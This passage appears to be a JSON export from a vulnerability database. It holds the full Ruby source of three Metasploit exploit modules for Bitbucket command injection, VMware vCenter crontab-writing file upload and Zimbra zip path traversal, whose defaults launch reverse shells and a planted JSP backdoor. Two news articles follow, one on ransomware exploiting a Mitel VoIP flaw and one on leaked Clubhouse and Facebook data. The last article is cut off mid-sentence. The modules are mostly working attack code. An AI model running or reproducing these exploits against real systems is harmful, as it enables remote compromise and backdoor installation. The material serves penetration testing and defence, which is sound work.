versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated command injection vulnerability in multiple API endpoints. The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint creates an archive of the repository, leveraging the `git-archive` command to do so. Supplying NULL bytes to the request enables the passing of additional arguments to the command, ultimately enabling execution of arbitrary commands.\n", "cvss3": {}, "published": "2022-09-19T22:28:17", "type": "metasploit", "title": "Bitbucket Git Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-10-01T07:54:59", "id": "MSF:EXPLOIT-LINUX-HTTP-BITBUCKET_GIT_CMD_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/bitbucket_git_cmd_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Bitbucket Git Command Injection',\n 'Description' => %q{\n Various versions of Bitbucket Server and Data Center are vulnerable to\n an unauthenticated command injection vulnerability in multiple API endpoints.\n\n The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint\n creates an archive of the repository, leveraging the `git-archive` command to do so.\n Supplying NULL bytes to the request enables the passing of additional arguments to the\n command, ultimately enabling execution of arbitrary commands.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'TheGrandPew', # discovery\n 'Ron Bowes', # analysis and PoC\n 'Jang', # testanull - PoC\n 'Shelby Pace' # Metasploit module\n ],\n 'References' => [\n [ 'URL', 'https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/' ],\n [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],\n [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],\n [ 'URL', 'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ],\n [ 'CVE', '2022-36804' ]\n ],\n 'Platform' => [ 'linux' ],\n 'Privileged' => false,\n 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],\n 'Targets' => [\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Type' => :linux_dropper,\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'CmdStagerFlavor' => %w[wget curl bourne],\n 'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Type' => :unix_cmd,\n 'Arch' => ARCH_CMD,\n 'Payload' => { 'BadChars' => %(:/?#[]@) },\n 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }\n }\n ]\n ],\n 'DisclosureDate' => '2022-08-24',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(7990),\n OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']),\n OptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]),\n OptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'keep_cookies' => true,\n 'uri' => normalize_uri(target_uri.path, 'login')\n )\n\n return CheckCode::Unknown('Failed to receive response from application') unless res\n\n unless res.body.include?('Bitbucket')\n return CheckCode::Safe('Target does not appear to be Bitbucket')\n end\n\n footer = res.get_html_document&.at('footer')\n return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer\n\n version_str = footer.at('span')&.children&.text\n return CheckCode::Detected('Cannot find version string in footer') unless version_str\n\n matches = version_str.match(/v(\\d+\\.\\d+\\.\\d+)/)\n return CheckCode::Detected('Version unknown') unless matches && matches.length > 1\n\n version_str = matches[1]\n vprint_status(\"Found Bitbucket version: #{matches[1]}\")\n\n num_vers = Rex::Version.new(version_str)\n return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17')\n\n major, minor, revision = version_str.split('.')\n case major\n when '6'\n return CheckCode::Appears\n when '7'\n case minor\n when '6'\n return CheckCode::Appears if revision.to_i < 17\n when '17'\n return CheckCode::Appears if revision.to_i < 10\n when '21'\n return CheckCode::Appears if revision.to_i < 4\n end\n when '8'\n case minor\n when '0', '1'\n return CheckCode::Appears if revision.to_i < 3\n when '2'\n return CheckCode::Appears if revision.to_i < 2\n when '3'\n return CheckCode::Appears if revision.to_i < 1\n end\n end\n\n CheckCode::Detected\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def authenticate\n print_status(\"Attempting to authenticate with user '#{username}' and password '#{password}'\")\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login'),\n 'keep_cookies' => true\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),\n 'keep_cookies' => true,\n 'vars_post' =>\n {\n 'j_username' => username,\n 'j_password' => password,\n 'submit' => 'Log in'\n }\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'dashboard'),\n 'keep_cookies' => true\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res\n\n unless res.body.include?('Your work') && res.body.include?('Projects')\n fail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid')\n end\n\n @authenticated = true\n print_good('Successfully logged into Bitbucket!')\n end\n\n def find_public_repo\n print_status('Searching Bitbucket for publicly accessible repository')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),\n 'keep_cookies' => true\n )\n\n fail_with(Failure::Disconnected, 'Did not receive a response') unless res\n json_data = JSON.parse(res.body)\n fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data\n\n unless json_data['size'] > 0\n fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')\n end\n\n # opt for public repos unless none exist.\n # Attempt to use a private repo if so\n repos = json_data['values']\n possible_repos = repos.select { |repo| repo['public'] == true }\n if possible_repos.empty? && @authenticated\n possible_repos = repos.select { |repo| repo['public'] == false }\n end\n\n fail_with(Failure::NotFound, 'There doesn\\'t appear to be any repos to use') if possible_repos.empty?\n possible_repos.each do |repo|\n project = repo['project']\n next unless project\n\n @project = project['key']\n @repo = repo['slug']\n break if @project && @repo\n end\n\n fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo\n print_good(\"Found public repo '#{@repo}' in project '#{@project}'!\")\n end\n\n def execute_command(cmd, _opts = {})\n uri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive')\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri,\n 'keep_cookies' => true,\n 'vars_get' =>\n {\n 'format' => 'zip',\n 'path' => Rex::Text.rand_text_alpha(2..5),\n 'prefix' => \"#{Rex::Text.rand_text_alpha(1..3)}\\x00--exec=`#{cmd}`\\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}\"\n }\n )\n end\n\n def exploit\n @authenticated = false\n authenticate unless username.blank? && password.blank?\n find_public_repo\n\n if target['Type'] == :linux_dropper\n execute_cmdstager(linemax: 6000)\n else\n execute_command(payload.encoded)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/bitbucket_git_cmd_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-19T22:40:51", "description": "This module exploits a file upload in VMware vCenter Server's analytics/telemetry (CEIP) service to write a system crontab and execute shell commands as the root user. Note that CEIP must be enabled for the target to be exploitable by this module. CEIP is enabled by default.\n", "cvss3": {}, "published": "2021-10-06T21:43:57", "type": "metasploit", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-20T19:16:46", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_ANALYTICS_FILE_UPLOAD-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vcenter_analytics_file_upload/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',\n 'Description' => %q{\n This module exploits a file upload in VMware vCenter Server's\n analytics/telemetry (CEIP) service to write a system crontab and\n execute shell commands as the root user.\n\n Note that CEIP must be enabled for the target to be exploitable by\n this module. CEIP is enabled by default.\n },\n 'Author' => [\n 'George Noseevich', # Discovery\n 'Sergey Gerasimov', # Discovery\n 'VMware', # Initial PoC\n 'Derek Abdine', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-22005'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],\n ['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],\n ['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],\n ['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']\n ],\n 'DisclosureDate' => '2021-09-21',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'WfsDelay' => 60\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),\n 'vars_get' => {\n '_c' => ''\n }\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body == '\"FULL\"'\n return CheckCode::Safe('CEIP is not fully enabled.')\n end\n\n CheckCode::Appears('CEIP is fully enabled.')\n end\n\n def exploit\n print_status('Creating path traversal')\n\n # /var/log/vmware/analytics/prod/_c_i/\n unless write_file(rand_text_alphanumeric(8..16))\n fail_with(Failure::NotVulnerable, 'Failed to create path traversal')\n end\n\n print_good('Successfully created path traversal')\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n\n print_warning(\"Please wait up to #{wfs_delay} seconds for a session\")\n end\n\n def execute_command(cmd, _opts = {})\n print_status(\"Writing system crontab: #{crontab_path}\")\n\n crontab_file = crontab(cmd)\n vprint_line(crontab_file)\n\n # /var/log/vmware/analytics/prod/_c_i/../../../../../../etc/cron.d/\n unless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file)\n fail_with(Failure::PayloadFailed, 'Failed to write system crontab')\n end\n\n print_good('Successfully wrote system crontab')\n end\n\n def write_file(path, data = nil)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),\n 'ctype' => 'application/json',\n 'vars_get' => {\n '_c' => '',\n '_i' => \"/#{path}\"\n },\n 'data' => data\n )\n\n return false unless res&.code == 201\n\n true\n end\n\n def crontab(cmd)\n # https://man7.org/linux/man-pages/man5/crontab.5.html\n <<~CRONTAB.strip\n * * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/\n * * * * * root #{cmd}\n CRONTAB\n end\n\n def crontab_path\n \"/etc/cron.d/#{crontab_name}.json\"\n end\n\n def crontab_name\n @crontab_name ||= rand_text_alphanumeric(8..16)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vcenter_analytics_file_upload.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-03T15:23:32", "description": "This module POSTs a ZIP file containing path traversal characters to the administrator interface for Zimbra Collaboration Suite. If successful, it plants a JSP-based backdoor within the web directory, then executes it. The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's ZIP implementation that can result in the extraction of an arbitrary file to an arbitrary location on the host. This issue is exploitable on the following versions of Zimbra: * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier) * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier) Note that the Open Source Edition is not affected.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-23T16:43:51", "type": "metasploit", "title": "Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-08-23T16:44:03", "id": "MSF:EXPLOIT-LINUX-HTTP-ZIMBRA_MBOXIMPORT_CVE_2022_27925-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/zip'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)',\n 'Description' => %q{\n This module POSTs a ZIP file containing path traversal characters to\n the administrator interface for Zimbra Collaboration Suite. If\n successful, it plants a JSP-based backdoor within the web directory, then\n executes it.\n\n The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's\n ZIP implementation that can result in the extraction of an arbitrary file\n to an arbitrary location on the host.\n\n This issue is exploitable on the following versions of Zimbra:\n\n * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)\n * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)\n\n Note that the Open Source Edition is not affected.\n },\n 'Author' => [\n 'Volexity Threat Research', # Initial writeup\n \"Yang_99's Nest\", # PoC\n 'Ron Bowes', # Analysis / module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-27925'],\n ['CVE', '2022-37042'],\n ['URL', 'https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/'],\n ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa22-228a'],\n ['URL', 'https://www.yang99.top/index.php/archives/82/'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbraAdmin/public/',\n 'TARGET_FILENAME' => nil,\n 'RPORT' => 7071,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-05-10',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']),\n OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),\n OptString.new('TARGET_USERNAME', [ true, 'The target user, must be valid on the Zimbra server', 'admin']),\n ]\n )\n end\n\n # Generate an on-system filename using datastore options\n def generate_target_filename\n if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')\n print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')\n end\n\n File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\")\n end\n\n # Normalize the path traversal and figure out where it is relative to the web root\n def zimbra_get_public_path(target_filename)\n # Normalize the path\n normalized_path = Pathname.new(File.join('/opt/zimbra/log', target_filename)).cleanpath\n\n # Figure out where it is, relative to the webroot\n webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/')\n relative_path = normalized_path.relative_path_from(webroot)\n\n # Hopefully, we found a path from the webroot to the payload!\n if relative_path.to_s.start_with?('../')\n return nil\n end\n\n relative_path\n end\n\n def exploit\n print_status('Encoding the payload as a .jsp file')\n payload = Msf::Util::EXE.to_jsp(generate_payload_exe)\n\n # Create a file\n target_filename = generate_target_filename\n print_status(\"Target filename: #{target_filename}\")\n\n # Create a zip file\n zip = Rex::Zip::Archive.new\n zip.add_file(target_filename, payload)\n data = zip.pack\n\n print_status('Sending POST request with ZIP file')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => \"/service/extension/backup/mboximport?account-name=#{datastore['TARGET_USERNAME']}&ow=1&no-switch=1&append=1\",\n 'data' => data\n )\n\n # Check the response\n if res.nil?\n fail_with(Failure::Unreachable, \"Could not connect to the target port (#{datastore['RPORT']})\")\n elsif res.code == 404\n fail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable')\n elsif res.code != 401\n print_warning(\"Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed\")\n end\n\n # Get the public path for triggering the vulnerability, terminate if we\n # can't figure it out\n public_filename = zimbra_get_public_path(target_filename)\n if public_filename.nil?\n fail_with(Failure::BadConfig, 'Could not determine the public web path, maybe you need to traverse further back?')\n end\n\n register_file_for_cleanup(target_filename)\n\n print_status(\"Trying to trigger the backdoor @ #{public_filename}\")\n\n # Trigger the backdoor\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n if res.nil?\n fail_with(Failure::Unreachable, 'Could not connect to trigger the payload')\n elsif res.code == 200\n print_good('Successfully triggered the payload')\n elsif res.code == 404\n fail_with(Failure::Unknown, \"Payload was not uploaded, the server probably isn't vulnerable\")\n else\n fail_with(Failure::Unknown, \"Could not connect to the server to trigger the payload: HTTP/#{res.code}\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2022-06-28T12:49:55", "description": "Ransomware groups are abusing unpatched versions of a Linux-based Mitel VoIP (Voice over Internet Protocol) application and using it as a springboard plant malware on targeted systems. The critical remote code execution (RCE) flaw, tracked as [CVE-2022-29499](<https://nvd.nist.gov/vuln/detail/CVE-2022-29499>), was first [report by Crowdstrike](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>) in April as a zero-day vulnerability and is now patched.\n\nMitel is popularly known for providing business phone systems and unified communication as a service (UCaaS) to all forms of organizations. The Mitel focuses on VoIP technology allowing users to make phone calls using an internet connection instead of regular telephone lines.\n\nAccording to Crowdstrike, the vulnerability affects the Mitel MiVoice appliances SA 100, SA 400 and Virtual SA. The MiVoice provides a simple interface to bring all communications and tools together.\n\n## **Bug Exploited to Plant Ransomware **\n\nResearcher at Crowdstrike recently investigated a suspected ransomware attack. The team of researchers handled the intrusion quickly, but believe the involvement of the vulnerability (CVE-2022-29499) in the ransomware strike.\n\nThe Crowdstrike identifies the origin of malicious activity linked to an IP address associated with a Linux-based Mitel VoIP appliance. Further analysis led to the discovery of a novel remote code exploit.\n\n\u201cThe device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment,\u201d Patrick Bennet [wrote in a blog post](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>).\n\nThe exploit involves two GET requests. The first one targets a \u201cget_url\u201d parameter of a PHP file and the second one originates from the device itself.\n\n\u201cThis first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses,\u201d the researcher explained.\n\nThe second request executes the command injection by performing an HTTP GET request to the attacker-controlled infrastructure and runs the stored command on the attacker\u2019s server.\n\nAccording to the researchers, the adversary uses the flaw to create an SSL-enabled reverse shell via the \u201cmkfifo\u201d command and \u201copenssl_client\u201d to send outbound requests from the compromised network. The \u201cmkfifo\u201d command is used to create a special file specified by the file parameter and can be opened by multiple processes for reading or writing purposes.\n\nOnce the reverse shell was established, the attacker created a web shell named \u201cpdf_import.php\u201d. The original content of the web shell was not recovered but the researchers identifies a log file that includes a POST request to the same IP address that the exploit originated from. The adversary also downloaded a tunneling tool called \u201cChisel\u201d onto VoIP appliances to pivot further into the network without getting detected.\n\nThe Crowdstrike also identifies anti-forensic techniques performed by the threat actors to conceal the activity.\n\n\u201cAlthough the threat actor deleted all files from the VoIP device\u2019s filesystem, CrowdStrike was able to recover forensic data from the device. This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor,\u201d said Bennett.\n\nMitel released a [security advisory](<https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0002>) on April 19, 2022, for MiVoice Connect versions 19.2 SP3 and earlier. While no official patch has been released yet.\n\n## **Vulnerable Mitel Devices on Shodan**\n\nThe security researcher Kevin Beaumont shared a string \u201chttp.html_hash:-1971546278\u201d to search for vulnerable Mitel devices on the Shodan search engine in a [Twitter thread](<https://twitter.com/GossiTheDog/status/1540354721931841537>).\n\nAccording to Kevin, there are approximately 21,000 publicly accessible Mitel appliances worldwide, the majority of which are located in the United States, succeeded by the United Kingdom.\n\n## **Mitel Mitigation Recommendations **\n\nCrowdstrike recommends that organizations tighten defense mechanisms by performing threat modeling and identifying malicious activity. The researcher also advised segregating the critical assets and perimeter devices to restrict the access control in case perimeter devices are compromised.\n\n\u201cTimely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant,\u201d Bennett explained.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-28T12:42:34", "type": "threatpost", "title": "Mitel VoIP Bug Exploited in Ransomware Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-06-28T12:42:34", "id": "THREATPOST:7F03D6D7702417D24F26A06CBC31EE83", "href": "https://threatpost.com/mitel-voip-bug-exploited/180079/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-28T22:42:30", "description": "On its own, the database of 3.8 billion phone numbers [leaked from ](<https://threatpost.com/clubhouse-users-data-hacker-forum/165354/>) social-media platform Clubhouse didn\u2019t have much value on the underground market. In fact, they were eventually dumped in a hacker forum for free.\n\nBut an enterprising threat actor has reportedly combined those phone numbers with 533 million [Facebook profiles leaked last April](<https://threatpost.com/facebook-accounts-leaked-check-exposed/165245/>) and is selling that enFhanced trove of personal identifiable information (PII) to the highest bidder on the underground market.\n\nAccording to CyberNews, the combined [Clubhouse-Facebook database](<https://cybernews.com/security/3-8-billion-allegedly-scraped-and-merged-clubhouse-and-facebook-user-records-put-for-sale-online/>) includes names, phone numbers and other data, and is listed on an underground forum for $100,000 for all 3.8 billion entries, with smaller chunks of data available for less. Reportedly, the seller is still looking for buyers.\n\n## **Data Likely to Fuel ATO Attacks **\n\nThese credentials could quickly be leveraged for basic account takeover (ATO) attacks, according to Brian Uffelman, who is a security analyst for PerimeterX.\n\n\u201cThese stolen credentials are then used for credential-stuffing and ATO attacks, which can steal value, whether that is in the form of gift cards, credit-card numbers, loyalty points or making false purchases,\u201d Uffelman told Threatpost. \u201cATO attacks are a major threat to any business and all of this just creates more fuel to feed the ATO attack fire.\u201d\n\nHe added that it\u2019s much easier for cybercriminals to use stolen credentials than to do the work of trying to find holes in an organization\u2019s cybersecurity defenses. In fact, Uffelman pointed out PerimeterX research showed out of all login attempts measured in the second-half of 2020, up to 85 percent were ATO attempts.\n\n\u201cOrganizations need to be aware of signs that they\u2019ve been attacked,\u201d Uffelman warned. \u201cThese can include surges in help-desk calls, spikes in password resets and inhuman user behaviors, such as thousands of login attempts on an account in a short time period and then take the appropriate action to block these attacks.\u201d\n\nUsers need to be aware of signs of breach, too, he added.\n\n\u201cConsumers need to ensure they are using varied and robust passwords across different websites and applications and lock down their credit reports as well.\u201d\n\n## **Facebook-Clubhouse Data Will Fuel Smishing Attacks **\n\n[Smishing](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>), or socially engineered phishing attempts conducted through SMS text messages, is a likely way cybercriminals will try to turn this database into profit, Jake Williams, from BreachQuest told Threatpost.\n\n\u201cWith this information, threat actors can send SMS phishes while spoofing the sender\u2019s number of a known friend,\u201d Williams said. \u201cA threat actor could go even further by using an SMS phishing pretext tailored to the victim based on their recent Facebook posts. Users are advised to be extremely careful in acting on unexpected SMS messages, even from senders they believe they know.\u201d\n\nWilliams added that Clubhouse users need to be on the lookout for suspicious texts, particularly those asking to transfer funds or confirm requests with a phone call, which are both common smishing tactics.\n\nAnd even if petty thieves don\u2019t see the value in the information, John Bambenek from Netenrich told Threatpost that he suspects intelligence agencies will take notice.\n\n\u201cBreaches like these often get sold at a discount because the ones who stole the data don\u2019t know what to do with it. In some cases, intelligence agencies will buy them if they have targets of interest on those platforms,\u201d Bambenek said. \u201cLikely the biggest use will go into the secondary consumer data market for those who want to build profiles for specific ad targeting.\u201d\n\nBeyond immediate ramifications of the enhanced data falling into the wrong hands, Archie Agarwal from ThreatModeler pointed out that as these leaks continue, it will enable threat actors to create incredibly rich profiles of targets.\n\n\u201cAside from using data like this for more targeted scamming, there is a much larger concern,\u201d Agarwal told Threatpost. \u201cAs we share more and more personal information across an ever-growing list of social-media platforms, combining data gleaned from this type of scraping, together with leaked breach information and leveraging big-data analytics to mine it, could potentially reveal previously hidden information and behaviors on users.\u201d\n\n## **Users Have Accepted Risks **\n\nWhile the infosec community is alarmed by the prospect of all that data floating around, Roger Grimes from KnowBe4 doesn\u2019t expect the seller of the combined Clubhouse-Facebook data to get much finanical gain out of the 